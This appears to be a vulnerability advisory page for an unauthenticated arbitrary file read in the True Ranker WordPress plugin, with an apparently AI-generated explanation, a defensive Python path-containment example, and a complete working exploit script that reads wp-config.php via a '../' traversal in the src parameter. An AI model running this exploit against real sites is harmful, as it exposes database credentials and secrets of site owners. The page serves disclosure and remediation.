True Ranker <= 2.2.2 Directory Traversal/Arbitrary File Read
Description
The True Ranker plugin <= 2.2.2 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- Range: <= 2.2.2
- True Ranker / True Ranker v5, range: 2.2.2
Patches
Vulnerability mechanics
Root cause
"The plugin fails to sanitize user-supplied input in the `src` parameter, allowing for directory traversal."
Attack vector
An unauthenticated attacker can exploit this vulnerability by sending a POST request to the `examples.php` file within the plugin's directory. The request must include a crafted `src` parameter containing a path traversal sequence; the public PoC prefixes it with `/scripts/simple.php/` and then climbs out of the examples directory with `../` segments, e.g. `../../../../../../../../../wp-config.php`, to read sensitive files on the server [ref_id=1]. The vulnerability is present in versions up to and including 2.2.2 of the True Ranker plugin [ref_id=1].
Affected code
The vulnerability resides in the `~/admin/vendor/datatables/examples/resources/examples.php` file, specifically where the `src` parameter is processed without proper sanitization. This allows for arbitrary file reads, including sensitive files like `wp-config.php` [ref_id=1].
What the fix does
The advisory does not specify a patch or provide details on how the vulnerability is fixed. Remediation guidance suggests updating the plugin to a version that addresses this issue. Users should consult the vendor for specific patch information or updated versions.
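The advisory shows neither the vulnerable PHP nor a patch, so the following is an added example, not code from the plugin or from the advisory: a Python model of the containment check that any fix for this class of bug needs before the value of `src` is handed to a file function. The plugin path comes from the PoC on this page; the document root `/var/www/html`, the string-level (no filesystem) resolution, and the function names are assumptions made for the illustration.

```python
#!/usr/bin/env python3
"""Added example (not the plugin's or the advisory's code): model the
path-containment check that examples.php lacks. Resolution is done with
posixpath on strings only, so this runs offline without touching the disk."""
import posixpath

# Assumed document root; the plugin-relative part is the path from the advisory.
EXAMPLES_DIR = ("/var/www/html/wp-content/plugins/seo-local-rank"
                "/admin/vendor/datatables/examples")


def resolve_src(src: str, base_dir: str = EXAMPLES_DIR) -> str:
    """Absolute path that `src` lands on when appended under base_dir and the
    '..' segments are collapsed, i.e. what a naive `base . '/' . $src`
    effectively opens. A leading '/' is stripped so src is always relative."""
    return posixpath.normpath(posixpath.join(base_dir, src.lstrip("/")))


def is_contained(src: str, base_dir: str = EXAMPLES_DIR) -> bool:
    """True only if the resolved path is base_dir itself or lies below it.
    The trailing '/' in the prefix test stops '/examples_backup' from passing
    as if it were inside '/examples'."""
    resolved = resolve_src(src, base_dir)
    base = posixpath.normpath(base_dir)
    return resolved == base or resolved.startswith(base + "/")


def open_example(src: str, base_dir: str = EXAMPLES_DIR) -> str:
    """Gatekeeper a fixed examples.php would need: refuse anything that escapes
    the examples directory, otherwise return the resolved path to open."""
    if not is_contained(src, base_dir):
        raise PermissionError(f"src escapes the examples directory: {src!r}")
    return resolve_src(src, base_dir)


if __name__ == "__main__":
    # Legitimate value the DataTables examples page would send.
    print(open_example("/scripts/simple.php"))
    # Shape of the PoC payload: a real file under examples/, then ten climbs.
    evil = "/scripts/simple.php/" + "../" * 10 + "wp-config.php"
    print("resolves to", resolve_src(evil))
    try:
        open_example(evil)
    except PermissionError as exc:
        print("blocked:", exc)
```

The check works on normalized strings, which is enough to reject the `../` payload but not a symlink planted inside the examples directory; a real fix should canonicalize with `realpath()` on both the base and the candidate and compare those, and in this case the simpler answer is to delete the bundled DataTables `examples/` tree from the deployed plugin altogether.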
Preconditions
- auth: The vulnerability is unauthenticated.
- input: The attacker must be able to send a POST request to the vulnerable endpoint.
Reproduction
```python
#!/usr/bin/env python3
# Public PoC from the Packet Storm advisory [ref_id=1], reflowed from the
# flattened text on this page; behaviour is unchanged.
import argparse
import sys

import requests

parser = argparse.ArgumentParser(
    description="Exploit The True Ranker plugin - Read arbitrary files",
    formatter_class=argparse.RawTextHelpFormatter,
)
group_must = parser.add_argument_group("must arguments")
group_must.add_argument(
    "-u", "--url",
    help="WordPress Target URL (Example: http://127.0.0.1:8080)",
    required=True,
)
parser.add_argument(
    "-p", "--payload",
    help="Path to read [default] ../../../../../../../../../../wp-config.php",
    default="../../../../../../../../../../wp-config.php",
    required=False,
)
args = parser.parse_args()

if len(sys.argv) <= 2:
    print("Exploit Usage: ./exploit.py -h [help] -u [url]")
    sys.exit()

HOST = args.url
PAYLOAD = args.payload

# The vulnerable script ships inside the plugin's bundled DataTables examples.
url = ("{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables"
       "/examples/resources/examples.php".format(HOST))
# The traversal is prefixed with a path the examples page expects, then
# climbs out of the examples directory with the ../ segments.
payload = "/scripts/simple.php/{}".format(PAYLOAD)

r = requests.post(url, data={"src": payload})
if r.status_code == 200:
    print(r.text)
else:
    print("No exploit found")
```
[ref_id=1]
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- packetstormsecurity.com/files/165434/WordPress-The-True-Ranker-2.2.2-Arbitrary-File-Read.html
- plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php
- www.wordfence.com/vulnerability-advisories/